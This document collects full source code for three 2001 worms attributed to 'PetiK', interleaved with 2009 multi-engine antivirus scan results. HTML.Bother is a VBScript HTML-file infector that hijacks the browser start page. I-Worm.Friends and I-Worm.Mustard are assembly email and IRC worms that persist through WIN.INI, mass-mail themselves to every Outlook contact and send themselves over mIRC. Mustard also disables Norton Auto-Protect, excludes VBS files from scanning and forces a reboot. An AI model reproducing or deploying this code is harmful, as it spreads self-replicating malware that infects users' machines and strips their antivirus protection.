File Starmania.vbs received on 05.16.2009 19:40:56 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result IRC-Worm.VBS.Generic!IK VBS/Starmania.1 Worm/VBS.Generic VBS/StarMania.A@m VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.E9844292 VBS/StarMania.A Worm.VBS-14 IRC-Worm.VBS.Generic modification of VBS.Merlin VBS.Petick. VBS/VBSWG!generic VBS/StarMania.A@m IRC-Worm.VBS.Generic VBS/StarMania.A@mm Generic.ScriptWorm.E9844292 IRC-Worm.VBS.Generic IRC-Worm.VBS.Generic VBS/Chism VBS/Chism Script.Starmania.1 Virus:VBS/Lofix probably unknown SCRIPT mIRC/Gen_VBS VBS.Holiday.A@mm VBS/Starmania VBS.Starma.A Worm.Hopalong VBS/Starmania VBS.ManiaStar.A@mm VBS_GENERIC.009 IRC-Worm.VBS.Generic -

Additional information
File size: 4566 bytes
MD5...: db45536af4e9a1debccb73111fce3f3f
SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e

<!--
Name     : HTML.Bother
Author   : PetiK
Language : HTML/VBS
' It creates on the desktop a file "Hello.txt" with this message:
'   "HTML.Bother by PetiK (06/05/2001)"
'   "A HTML.Worm made in France"
' Creates %SYSDIR%\PetiK.htm
' It infects HTM and HTML files in the Personal directory and in %WINDIR%\WEB
-->
<bother>
<html><head><title>Patch for Internet Explorer</title></head>
<body bgColor=#ffffff>
<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this page.
<br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font>
<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
bureau=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
Set txt=fso.CreateTextFile(bureau&"\Hello.txt")
txt.WriteLine "HTML.Bother by PetiK (06/05/2001)"
txt.WriteLine "A HTML.Worm made in France"
txt.Close
start=ws.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
If start <> fso.GetSpecialFolder(1)&"\PetiK.htm" Then
 Set htm=fso.CreateTextFile(fso.GetSpecialFolder(1)&"\PetiK.htm",2)
 htm.WriteLine ("<html><head><title>HTML.Bother</title>")
 htm.WriteLine ("<body><IFRAME SRC='"+start+"'></IFRAME>")
 htm.WriteLine ("<font face='verdana' color=blue size='2'>")
 htm.WriteLine ("<br><br>Hi, you have my Worm.")
 htm.WriteLine ("<br>It's not dangerous.")
 htm.WriteLine ("<br>Contact Symantec Corporation (www.symantec.com/avcenter) to disinfect your computer")
 htm.WriteLine ("</body></html>")
 htm.Close
 ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(1)&"\PetiK.htm"
End If
p = Int(Rnd * 30) + 1
If Day(Now()) = p Then
 WshShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69"
End If
doc=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
Set FolderObj = FSO.GetFolder(doc)
Set FO = FolderObj.Files
For each cible in FO
 ExtName = lcase(FSO.GetExtensionName(cible.Name))
 if ExtName = "htm" or ExtName = "html" Then
  Set vrai = fso.OpenTextFile(cible.path, 1, False)
  if vrai.readline <> "<bother>" Then
   vrai.close()
   Set vrai = fso.OpenTextFile(cible.path, 1, False)
   htmorg = vrai.ReadAll()
   vrai.close()
   Set virus = document.body.createTextRange
   Set vrai = fso.CreateTextFile(cible.path, True, False)
   vrai.WriteLine "<bother>"
   vrai.Write(htmorg)
   vrai.WriteLine "<bother par PetiK May 9th 2001>"
   vrai.WriteLine virus.htmltext
   vrai.Close()
  else
   Real.close()
  end if
 end if
next
Set FolderObj = FSO.GetFolder(fso.GetSpecialFolder(0)&"\WEB")
Set FO = FolderObj.Files
For each cible in FO
 ExtName = lcase(FSO.GetExtensionName(cible.Name))
 if ExtName = "htm" or ExtName = "html" Then
  Set vrai = fso.OpenTextFile(cible.path, 1, False)
  if vrai.readline <> "<bother>" Then
   vrai.close()
   Set vrai = fso.OpenTextFile(cible.path, 1, False)
   htmorg = vrai.ReadAll()
   vrai.close()
   Set virus = document.body.createTextRange
   Set vrai = fso.CreateTextFile(cible.path, True, False)
   vrai.WriteLine "<bother>"
   vrai.Write(htmorg)
   vrai.WriteLine "<bother par PetiK May 9th 2001>"
   vrai.WriteLine virus.htmltext
   vrai.Close()
  else
   Real.close()
  end if
 end if
next
</SCRIPT>
</body>
</html>

File Bother.htm received on 05.16.2009 11:20:32 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.15 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 3255 bytes MD5...: 915aaf9b61f0d62c1fc2082198b324be SHA1..: e2bf913ffca85e796ecef0564a896625dc748332

Result Virus.VBS.Both!IK HTML/Bother VBS/Both Virus/VBS.VBS VBS/Both.A VBS:Malware-gen VBS/Bother.A VBS.Both.A VBS/Both.A VBS.Startpage-1 VBS.Bother Virus.VBS.Both VBS/Both VBS/Both.A Virus.VBS.Both VBS/Both.A VBS.Both.A Virus.VBS.Both Virus.VBS.Both VBS/Bother VBS/Bother Script.Both Virus:VBS/SYSID VBS/Bother VBS/Both.K VBS.Both.A Univ.A VBS.Bother.A Script.HTML.Both VBS/Bother Virus.VBS.Both (v) VBS.Bother.3180 HTML_BOTHER.A Virus.VBS.Both VBS.Both VBS.Bother.A

comment #
Name   : I-Worm.Friends
Author : PetiK
Date   : May 13th - May 15th 2001
Action : This worm uses a VBS script and Microsoft Outlook to spread.
         It copies itself to \%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe.
         It creates a script file for mIRC in C:\mirc and C:\mirc32.
         The first time it runs, it shows a fake WinZip message box.
         The worm creates C:\Friends and creates the file maya.vbs to spread.
         It changes the values:
           HKLM\Software\Microsoft\Windows\CurrentVersion
             RegisteredOwner        : Maya, Laurent, Etienne
             RegisteredOrganization : PetiK Corporation
         On the 5th of every month, it shows a message box.
#

.386
jumps
locals
.model flat,stdcall

;KERNEL32.dll
extrn WritePrivateProfileStringA:PROC
extrn lstrcat:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegOpenKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC

.data
szOrig db 50 dup (0)
szPTK db 50 dup (0)
szWin db 50 dup (0)
FileHandle dd ?
RegHandle dd ?
octets dd ?
winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
Copie db "\Iesetup.exe",00h
inifile db "\petik",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
VBS db "C:\Friends\maya.vbs",00h
DIR db "C:\Friends",00h
OWN_D db "RegisteredOwner",00h
OWN_S db "Maya, Laurent, Etienne",00h
ORG_D db "RegisteredOrganization",00h
ORG_S db "PetiK Corporation",00h
SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h
TITRE db "WinZip Self-Extractor",00h
TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h
TITRE2 db "I-Worm.Friends",00h
TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah
 db "",0dh,0ah
 db "To my friends Maya and Laurent",00h
email db "wscript C:\Friends\maya.vbs",00h

FILE_ATTRIBUTE_READONLY equ 00000001h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_LOCAL_MACHINE equ 80000002h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h

SYSTIME struct
 wYear WORD ?
 wMonth WORD ?
 wDayOfWeek WORD ?
 wDay WORD ?
 wHour WORD ?
 wMinute WORD ?
 wsecond WORD ?
 wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

petikd: db "[script]",0dh,0ah
 db "n0=on 1:JOIN:#:{",0dh,0ah
 db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
 db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
 db "",0dh,0ah
 db "n3=}",00h
PETIKTAILLE equ $-petikd

mayad: db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
 db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah
 db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
 db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
 db 'For Each M In L.AddressLists',0dh,0ah
 db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
 db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
 db 'Set P = M.AddressEntries(O)',0dh,0ah
 db 'Next',0dh,0ah
 db 'Set N = K.CreateItem(0)',0dh,0ah
 db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah
 db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah
 db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
 db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah
 db 'If N.To <> "" Then',0dh,0ah
 db 'N.Send',0dh,0ah
 db 'End If',0dh,0ah
 db 'End If',0dh,0ah
 db 'Next',0dh,0ah
MAYATAILLE equ $-mayad

.code
DEBUT:
PREPAR: push 50
 push offset szCopie
 call GetSystemDirectoryA
 push offset Copie
 push offset szCopie
 call lstrcat
FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script
 push offset szPTK
 call GetWindowsDirectoryA
 push offset inifile
 push offset szPTK
 call lstrcat
 push 00h
 push FILE_ATTRIBUTE_READONLY
 push CREATE_NEW
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset szPTK
 call CreateFileA
 cmp eax,-1 ; success ? continue
 je BDR ; or else, jump to label BDR
 mov [FileHandle],eax ; the file is created
 push 00h
 push offset octets
 push PETIKTAILLE
 push offset petikd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
MIRC: push 00h ; copy the file to C:\mirc
 push offset script1
 push offset szPTK
 call CopyFileA
 push 00h ; and C:\mirc32
 push offset script2
 push offset szPTK
 call CopyFileA
EMAIL: push 00h
 push offset DIR
 call CreateDirectoryA ; Create the directory C:\Friends
 push 00h
 push FILE_ATTRIBUTE_READONLY
 push CREATE_ALWAYS
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset VBS
 call CreateFileA ; and put the VBS file maya.vbs
 mov [FileHandle],eax
 push 00h
 push offset octets
 push MAYATAILLE
 push offset mayad
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
ENVOIE: push 01h ; run this file
 push offset email
 call WinExec
COPIE: push 00h ; Copy our file to \%SYSTEM%\Iesetup.exe
 call GetModuleHandleA
 push 50
 push offset szOrig
 push eax
 call GetModuleFileNameA
 push 00h
 push offset szCopie
 push offset szOrig
 call CopyFileA
WIN_INI:push 50h ; Write to WIN.INI file in run section
 push offset szWin ; [windows]
 call GetWindowsDirectoryA ; run=\%SYSTEM%\Iesetup.exe
 push offset winini
 push offset szWin
 call lstrcat
 push offset szWin
 push offset szCopie
 push offset run
 push offset windows
 call WritePrivateProfileStringA
MESS: push 10h ; Show the fake error message
 push offset TITRE
 push offset TEXTE
 push 00h
 call MessageBoxA
BDR: push offset RegHandle
 push KEY_SET_VALUE
 push 00h
 push offset SOUS_CLE
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
 push 02h ; Change the name of Registered Owner
 push offset OWN_D
 push offset REG_SZ
 push 00h
 push offset OWN_S
 push [RegHandle]
 call RegSetValueExA
 push 02h ; Change the name of Registered Organization
 push offset ORG_D
 push offset REG_SZ
 push 00h
 push offset ORG_S
 push [RegHandle]
 call RegSetValueExA
 push [RegHandle]
 call RegCloseKey
DATE: push offset SystemTime
 call GetSystemTime
 cmp [SystemTime.wDay],05h ; 5th of the month ?
 jne FIN
 push 40h ; Show a messagebox
 push offset TITRE2
 push offset TEXTE2
 push 00h
 call MessageBoxA
FIN: push 00h
 call ExitProcess

end DEBUT

File Friends.exe received on 05.16.2009 11:58:15 (CET)

Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Result Email-Worm.Win32.Petik!IK Win32/PetTick.6656 Worm/Petik.15 Worm/Win32.Win32 W32/Malware!543d Win32:PetiK-Friends I-Worm/Petik.B Generic.Malware.IM.34A9CFBA W32.Petik.B W32.PetTick Win32.Petik.6656 Win32/Petik.6656.A W32/Malware!543d Email-Worm.Win32.Petik W32/PetTick.B@mm Generic.Malware.IM.34A9CFBA Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.15 Worm:Win32/Petik.B Win32/Petik.B W32/Pet_Tick.6656.B Worm/W32.Petik.6656.C W32/Petik.B VBS.LoveLetter Worm.Mail.Petik.v W32/Petik-B Friends worm W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.B Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.6656.A VBS.LoveLetter

Additional information
File size: 6656 bytes
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8

comment #
Name   : I-Worm.Mustard
Author : PetiK
Date   : May 10th - 27th
Size   : 7168 bytes
Action : When the worm is first executed, it creates the key HKCU\Software\[PetiK].
         Then it copies itself as Windows\AVUpdate.exe and alters the run= line in
         the Win.ini file to: run=Windows\AVUpdate.exe.
         It tries to delete the value "Norton Auto-Protect" in the Run key of the registry.
         If it succeeds, it alters "Exclude.dat" so that VBS files are not scanned by Norton AntiVirus.
         It shows a message box and reboots the computer.
         On the next start, it creates a VBS worm with the attributes "readonly" and "hidden".
         On June 17th, it shows a message box.
#

.386
jumps
locals
.model flat,stdcall

extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn RegCreateKeyExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC

.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
szOrig db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
run db "run",00h
windows db "windows",00h
Winini db "\\WIN.INI",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h

TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
 db "",0dh,0ah
 db "Small but Pretty",0dh,0ah
 db "I Love You",0dh,0ah
 db "Since January",0dh,0ah
 db "I Think Of You",00h

HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRNET_USER equ 80000001h
KEY_ALL_ACCESS equ 0000003Fh
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_HIDDEN equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
OPEN_EXISTING equ 00000003h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
FILE_END equ 00000002h
EWX_REBOOT equ 00000002h
EWX_FORCE equ 00000004h

SYSTIME struct
 wYear WORD ?
 wMonth WORD ?
 wDayOfWeek WORD ?
 wDay WORD ?
 wHour WORD ?
 wMinute WORD ?
 wSecond WORD ?
 wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

mircd: db "[script]",0dh,0ah
 db "n0=on 1:JOIN:#:{",0dh,0ah
 db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
 db "n2= ./dcc send $nick "
szCopie db 50 dup (0)
 db "",0dh,0ah
 db "n3=}",00h
MIRCTAILLE equ $-mircd

sendd: db 'ENTREE()',0dh,0ah
 db 'Sub ENTREE',0dh,0ah
 db 'EMAIL()',0dh,0ah
 db 'End Sub',0dh,0ah
 db 'Sub EMAIL()',0dh,0ah
 db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
 db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
 db 'For Each M In L.AddressLists',0dh,0ah
 db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
 db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
 db 'Set P = M.AddressEntries(O)',0dh,0ah
 db 'Set N = K.CreateItem(0)',0dh,0ah
 db 'N.To = P.Address',0dh,0ah
 db 'N.Subject = "AntiVirus Update"',0dh,0ah
 db 'N.Body = "The last version of your AV"',0dh,0ah
 db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
 db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
 db 'N.DeleteAfterSubmit = True',0dh,0ah
 db 'If N.To <> "" Then',0dh,0ah
 db 'N.Send',0dh,0ah
 db 'End If',0dh,0ah
 db 'Next',0dh,0ah
 db 'End If',0dh,0ah
 db 'Next',0dh,0ah
 db 'End Sub',0dh,0ah
SENDTAILLE equ $-sendd

datd: db 02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
 db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd

.code
DEBUT:
VERIF: push offset regDisp ; HKCU\Software\[PetiK] exist ?
 push offset regResu
 push 00h
 push 0F003Fh
 push 00h
 push 00h
 push 00h
 push offset CLE
 push HKEY_CURRNET_USER
 call RegCreateKeyExA
 push [regResu]
 call RegCloseKey
 cmp [regDisp],1
 jne EMAIL ; YES => EMAIL
COPIE: push 00h ; Copy itself to \WINDIR\AVUpdate.exe
 call GetModuleHandleA
 push 50
 push offset szOrig
 push eax
 call GetModuleFileNameA
 push 50
 push offset szCopie
 call GetWindowsDirectoryA
 push offset Copie
 push offset szCopie
 call lstrcat
 push offset szCopie
 push offset szOrig
 call CopyFileA

WIN_INI:push 50 ; Alters the run= line in the WIN.INI
 push offset szWin ; run=\WINDIR\AVUpdate.exe
 call GetWindowsDirectoryA
 push offset Winini
 push offset szWin
 call lstrcat
 push offset szWin
 push offset szCopie
 push offset run
 push offset windows
 call WritePrivateProfileStringA
MIRC1: push 00h ; Create a ini script for mIRC
 push FILE_ATTRIBUTE_READONLY
 push CREATE_ALWAYS
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset mirc
 call CreateFileA
 mov [FileHandle],eax
 push 00h
 push offset octets
 push MIRCTAILLE
 push offset mircd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
MIRC2: push 00h ; Copy to \mirc
 push offset script1
 push offset mirc
 call CopyFileA
 push 00h ; \mirc32
 push offset script2
 push offset mirc
 call CopyFileA
 push 00h ; \Program Files\mirc
 push offset script3
 push offset mirc
 call CopyFileA
 push 00h ; \Program Files\mirc32
 push offset script4
 push offset mirc
 call CopyFileA
 push offset mirc ; and delete the first file
 call DeleteFileA
DEL_REG:push offset RegHandle
 push KEY_ALL_ACCESS
 push 00h
 push offset CLE_RUN
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
VAL1: push offset NAV ; Try to delete the "Norton Auto-Protect" value
 push [RegHandle]
 call RegDeleteValueA
 test eax,eax
 jnz EMAIL ; NO => jmp EMAIL

 push [RegHandle]
 call RegCloseKey
NORTON: push offset RegHandle ; Search the "InstallDir" of Norton
 push 001F0000h
 push 00h
 push offset CLE_NOR
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
 test eax,eax
 jnz FIN
 push offset BufferSize
 push offset Buffer
 push offset ValueType
 push 00h
 push offset Value
 push RegHandle
 call RegQueryValueExA
 push [RegHandle]
 call RegCloseKey
TRAFIC: push offset filedat
 push offset Buffer
 call lstrcat
 push offset Buffer
 call GetFileAttributesA
 cmp eax,FILE_ATTRIBUTE_READONLY ; Attribute read only for the file ?
 je FIN ; YES => FIN
 push 00h
 push FILE_ATTRIBUTE_NORMAL
 push OPEN_EXISTING
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset Buffer
 call CreateFileA
 cmp eax,-1 ; File exist ? NO => jmp REBOOT
 je REBOOT
 mov [FileHandle],eax
 push FILE_END ; End of the file
 push 00h
 push [Dist]
 push [FileHandle]
 call SetFilePointer
 push 00h ; Write data
 push offset octets
 push DATTAILLE
 push offset datd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
 push 5000 ; Wait 5 seconds
 call Sleep
 push FILE_ATTRIBUTE_READONLY ; Attribute read only for the file
 push offset Buffer
 call SetFileAttributesA

MESSAGE:push 40h
 push offset TITRE
 push offset TEXTE
 push 00h
 call MessageBoxA
REBOOT: push EWX_REBOOT or EWX_FORCE
 call ExitWindowsEx
EMAIL: push 00h
 push FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN
 push CREATE_NEW
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset VBS ; success ? continue
 call CreateFileA
 cmp eax,-1
 je DATE ; else, jump to label DATE
 mov [FileHandle],eax
 push 00h
 push offset octets
 push SENDTAILLE
 push offset sendd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
ENVOIE: push 01h
 push offset email
 call WinExec
ATTEND: push 10000
 call Sleep
EFFACE: push offset VBS
 call DeleteFileA
DATE: push offset SystemTime
 call GetSystemTime
 cmp [SystemTime.wDay],11h
 jne FIN
 cmp [SystemTime.wDay],06h
 jne FIN
 push 40h
 push offset TITRE2
 push offset TEXTE2
 push 00h
 call MessageBoxA
FIN: push 00h
 call ExitProcess

end DEBUT

